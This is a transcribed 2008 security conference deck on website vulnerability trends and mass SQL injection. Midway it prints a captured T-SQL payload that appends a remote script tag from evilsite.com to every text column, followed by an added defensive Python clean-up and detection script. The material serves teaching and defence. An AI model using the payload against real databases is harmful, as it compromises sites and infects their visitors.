© 2008 WhiteHat Security, Inc. Top Website Vulnerabilities: “Trends, Effects on Governmental Cyber Security, How to Fight Them.” Jeremiah Grossman WhiteHat Security founder & CTO
May 24, 2015
Jeremiah Grossman, WhiteHat Security Founder & CTO
Technology R&D and industry evangelist (InfoWorld's CTO Top 25 for 2007)
Frequent international conference speaker
Co-founder of the Web Application Security Consortium
Co-author: Cross-Site Scripting Attacks
Former Yahoo! information security officer
Job Description: Hack Everything!
Official Title: "the hacker yahoo"
Protect this website and the ~599 others
Find the vulnerabilities before the bad guys
WhiteHat Sentinel
• Unlimited Assessments – customer controlled and expert managed – the ability to scan websites no matter how big they are or how often they change
• Coverage – authenticated scans to identify technical vulnerabilities and custom testing to uncover business logic flaws
• Virtually Eliminate False Positives – the Operations Team verifies results and assigns the appropriate severity and threat rating
• Development and QA – the WhiteHat Satellite Appliance allows us to service intranet-accessible systems remotely
• Improvement & Refinement – real-world scans enable fast and efficient updates
Vulnerability Stack (figure): WhiteHat Security sits above the layer of "well-known" vulnerabilities covered by Symantec, Qualys, Nessus and nCircle.
Custom Web Applications, Custom Vulnerabilities
This data differs from the reports distributed by Symantec, Mitre (CVE), IBM (ISS) X-Force, SANS, and others. Those organizations track publicly disclosed vulnerabilities in commercial and open source software products, which may include Web application flaws as well. WhiteHat Security's data is different because it focuses solely on previously unknown vulnerabilities in custom web applications (code unique to that organization) on real-world websites.
168,000,000 websites
millions more added per month
809,000 websites use SSL
protecting password, credit card numbers, social security numbers,
and our email (if we’re lucky).
9 out of 10 websites have vulnerabilities
allowing hackers unauthorized access
hacked
A new infected Web page is discovered every 5 seconds, 24 hours a day, 365 days a year.
Over 79% of websites hosting malicious code are legitimate sites that were compromised by attackers.
Likelihood that a website has a vulnerability, by class (chart)
WhiteHat Security: Top 10
Likelihood that a website has a vulnerability, by severity (chart)
But how bad is it really?
Websites with Urgent, Critical, or High severity issues would, strictly speaking, not pass a PCI DSS compliance assessment.
Percentage of vulnerabilities ranked by severity (chart)
Another way to look at the badness
Overall vulnerability population (chart)
Technology Breakdown by file extension (chart)
Industry Verticals (chart): percentage of websites with either URGENT, CRITICAL or HIGH severity vulnerabilities, ranked by industry
Worst of the Worst (chart): percentage of vulnerability classes in the overall population, ranked by industry
Data input correlation
Average inputs per website: 154
Ratio of vulnerabilities to inputs: 2.2%
Average Time to Fix in Days (chart; axis 180 / 270 / 365)
Website            Founded
Amazon             1994
Yahoo              1995
eBay               1995
Bank of America    1997
Google             1998
MySpace            2003
YouTube            2005

Vulnerability / Attack          Year "well-known"
Buffer Overflow                 1996
Command Injection               1996
SQL Injection                   2004
XSS                             2005
Predictable Resource Location   ?
HTTP Response Splitting         2005 / ?
CSRF                            ?

Most of these major websites were launched before significant classes of attack were "well-known".
If there's just 1 vulnerability on 90% of the SSL websites (other reports say an average of 7):
809,000 × 90% = 728,100 total vulnerabilities
XSSed.com has reported:
20,843 total vulnerabilities
1,072 fixed (5%)
Mass SQL Injection
1. Google recon for weak websites (*.asp, *.php).
2. Generic SQL injection populates databases with malicious JavaScript IFRAMEs.
3. Visitors arrive (U.N., DHS, etc.) and their browsers auto-connect to a malware server, infecting their machines with trojans.
4. Botnets form and then continue SQL-injecting websites.
The injected T-SQL payload, as captured. It walks every text-typed column of every user table in the database and appends a remote script tag to each value. Note that convert(varchar, ...) with no length defaults to 30 characters in SQL Server, so longer values are truncated before the tag is appended, which is one reason these attacks were noticed by site owners.

    DECLARE @T varchar(255), @C varchar(255);
    DECLARE Table_Cursor CURSOR FOR
      SELECT a.name, b.name
      FROM sysobjects a, syscolumns b
      WHERE a.id = b.id AND a.xtype = 'u'      -- user tables only
        AND (b.xtype = 99 OR b.xtype = 35      -- ntext, text
          OR b.xtype = 231 OR b.xtype = 167);  -- nvarchar, varchar
    OPEN Table_Cursor;
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
    WHILE (@@FETCH_STATUS = 0) BEGIN
      -- dynamic UPDATE per (table, column): keep the existing value, append the tag
      EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');
      FETCH NEXT FROM Table_Cursor INTO @T, @C;
    END;
    CLOSE Table_Cursor;
    DEALLOCATE Table_Cursor;
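Added example (not from the deck, not WhiteHat code): a post-incident sweep modelled on the payload's own cursor walk. Because the attacker touched every text column of every user table, clean-up has to enumerate the same surface rather than fix the one column that was noticed. The script also flags request parameters that carry the cursor-based payload, including the hex-literal form (CAST(0x... AS NVARCHAR) wrapper) that the 2008 waves commonly used to smuggle it past filters; that wrapper is not shown in the deck. It targets SQLite so it runs offline; table names, column names, row contents and the keyword heuristic are all constructed for the example.

```python
"""Sweep a database for the appended script tag and flag the injecting request.

Constructed example against SQLite. The schema walk mirrors the payload's
sysobjects/syscolumns join (xtype 35/99/167/231 = text/ntext/varchar/nvarchar).
"""
import re
import sqlite3
from typing import Dict, List, Tuple

# Tag the payload appends (evilsite.com is the host in the captured payload);
# the pattern is loose so other hosts from the same wave match too.
SCRIPT_TAG_RE = re.compile(r"<script\s+src=[^>]*></script>", re.IGNORECASE)

# Long 0x... literals, the usual CAST(0x... AS NVARCHAR(4000)) smuggling form.
HEX_RE = re.compile(r"0x([0-9A-Fa-f]{16,})")

# Keywords the cursor payload cannot do without. Hypothetical heuristic,
# not a vendor signature: three or more in one parameter is a strong flag.
PAYLOAD_MARKERS = ("DECLARE", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "EXEC(")


def build_sample_db() -> sqlite3.Connection:
    """Constructed sample: two user tables, most text cells already tagged."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        """
    )
    tag = "<script src=http://evilsite.com/1.js></script>"
    conn.executemany(
        "INSERT INTO products (name, descr) VALUES (?, ?)",
        [("Widget" + tag, "Blue widget" + tag), ("Gadget" + tag, "Untouched")],
    )
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [("Launch" + tag, "We launched." + tag)],
    )
    conn.commit()
    return conn


def text_columns(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Every (table, column) with text affinity in user tables."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    out = []
    for t in tables:
        # Identifiers come from the schema, not from users; double-quote them.
        for _, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{t}")'):
            if "TEXT" in ctype.upper() or "CHAR" in ctype.upper():
                out.append((t, name))
    return out


def find_injected_cells(conn: sqlite3.Connection) -> Dict[Tuple[str, str], int]:
    """Count tagged cells per (table, column); empty dict means clean."""
    hits: Dict[Tuple[str, str], int] = {}
    for t, c in text_columns(conn):
        n = conn.execute(
            f'SELECT COUNT(*) FROM "{t}" WHERE "{c}" LIKE ?', ("%<script src=%",)
        ).fetchone()[0]
        if n:
            hits[(t, c)] = n
    return hits


def clean_injected_cells(conn: sqlite3.Connection) -> int:
    """Strip the tag from every affected cell; return the number of cells changed.
    Done row by row in Python (not SQL REPLACE) so the regex catches host variants."""
    changed = 0
    for t, c in list(find_injected_cells(conn)):
        rows = conn.execute(
            f'SELECT rowid, "{c}" FROM "{t}" WHERE "{c}" LIKE ?', ("%<script src=%",)
        ).fetchall()
        for rowid, value in rows:
            cleaned = SCRIPT_TAG_RE.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{t}" SET "{c}" = ? WHERE rowid = ?', (cleaned, rowid))
                changed += 1
    conn.commit()
    return changed


def decode_hex_blobs(param: str) -> str:
    """Return the parameter plus UTF-16LE decodes of any long 0x literals (NVARCHAR)."""
    parts = [param]
    for h in HEX_RE.findall(param):
        raw = bytes.fromhex(h if len(h) % 2 == 0 else h[:-1])
        parts.append(raw.decode("utf-16-le", errors="ignore"))
    return "\n".join(parts)


def looks_like_mass_sqli(param: str) -> bool:
    """Web-tier check on one URL-decoded request parameter."""
    upper = decode_hex_blobs(param).upper()
    return sum(marker in upper for marker in PAYLOAD_MARKERS) >= 3


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", find_injected_cells(db))
    print("cleaned cells:", clean_injected_cells(db))
    print("after:", find_injected_cells(db))
```

Cleaning the data only removes the symptom; the injection point (the string-concatenated query in the *.asp / *.php page that let the stacked DECLARE ... EXEC() through) still has to be replaced with a parameterized query, or the botnet's next pass re-tags every column.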
Share of all Internet queries returning at least one URL containing malicious content:
2006 - 0.3%
2007 - 1.3%
2008 - ?
Best Practices
Asset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can't secure what you don't know you own.
Measure Security – Perform rigorous and ongoing vulnerability assessments, preferably every week. Because you can't secure what you can't measure.
Development Frameworks – Provide programmers with software development tools that let them write code rapidly that also happens to be secure. Because you can't mandate secure code, only help it.
Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 9 in 10 websites are already insecure, there is no need to make it any easier.
For more information visit: www.whitehatsec.com/
Jeremiah Grossman, founder and CTO
blog: http://jeremiahgrossman.blogspot.com/
email: [email protected]
Thank You